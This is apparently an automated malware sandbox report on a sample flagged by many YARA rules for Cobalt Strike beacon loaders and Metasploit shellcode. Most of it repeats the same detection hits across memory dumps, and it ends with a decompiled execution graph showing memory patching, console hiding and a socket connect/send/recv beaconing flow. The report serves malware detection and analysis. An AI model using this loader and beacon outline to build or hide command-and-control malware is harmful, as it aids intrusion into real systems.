                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:9.7%
                                                                Dynamic/Decrypted Code Coverage:85.4%
                                                                Signature Coverage:9.2%
                                                                Total number of Nodes:2000
                                                                Total number of Limit Nodes:28
                                                                execution_graph 15976 b01090 15979 b02b00 _Mtx_lock 15976->15979 15980 b02b54 _Cnd_signal 15979->15980 15981 b02b4e ?_Throw_C_error@std@@YAXH 15979->15981 15982 b02b68 ?_Throw_C_error@std@@YAXH 15980->15982 15983 b02b6e _Mtx_unlock 15980->15983 15981->15980 15982->15983 15984 b02b84 15983->15984 15985 b02b7e ?_Throw_C_error@std@@YAXH 15983->15985 15991 b012c0 15984->15991 15985->15984 15988 b0109a 15989 b02b95 16002 b02dff 15989->16002 15992 b012e7 _Query_perf_frequency _Query_perf_counter 15991->15992 15993 b0145b 15991->15993 15999 b01346 __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15992->15999 16016 b02dbe 15993->16016 15995 b01469 _Cnd_do_broadcast_at_thread_exit 15995->15988 15995->15989 15996 b01315 _Query_perf_frequency _Query_perf_counter 15996->15999 15997 b013ea _Xtime_get_ticks 15997->15999 15998 b01425 _Thrd_sleep 15998->15999 16000 b0146d ?_Xbad_function_call@std@ 15998->16000 15999->15992 15999->15993 15999->15996 15999->15997 15999->15998 16005 b02bc0 15999->16005 16224 b032bc 16002->16224 16006 b02be9 16005->16006 16007 b02daa 16005->16007 16023 b01b30 6 API calls 16006->16023 16008 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16007->16008 16010 b02dba 16008->16010 16010->15999 16012 b01b30 18 API calls 16013 b02cc1 GetConsoleWindow ShowWindow WSAStartup 16012->16013 16029 b02180 16013->16029 16017 b02dc7 16016->16017 16018 b02dc9 IsProcessorFeaturePresent 16016->16018 16017->15995 16020 b030c0 16018->16020 16223 b03084 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16020->16223 16022 b031a3 16022->15995 16024 b01c6d CloseHandle CloseHandle CloseHandle FreeLibrary 16023->16024 16027 b01bd4 16023->16027 16025 b02dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16024->16025 16026 b01c98 16025->16026 16026->16012 16027->16024 16028 b01c19 VirtualProtect memcpy VirtualProtect 16027->16028 16028->16027 16067 b01ca0 16029->16067 16031 b0223c socket 16032 b022dc 16031->16032 16033 b0226c inet_addr 16031->16033 16170 b01050 16032->16170 16034 b02283 inet_addr gethostbyaddr 16033->16034 16035 b0227b gethostbyname 16033->16035 16037 b0229c 16034->16037 16035->16037 16037->16032 16038 b022a0 htons connect 16037->16038 16038->16032 16039 b02312 16039->16039 16040 b01050 __stdio_common_vsprintf 16039->16040 16041 b02381 16040->16041 16041->16041 16042 b02407 send memset recv 16041->16042 16043 b02451 realloc memcpy 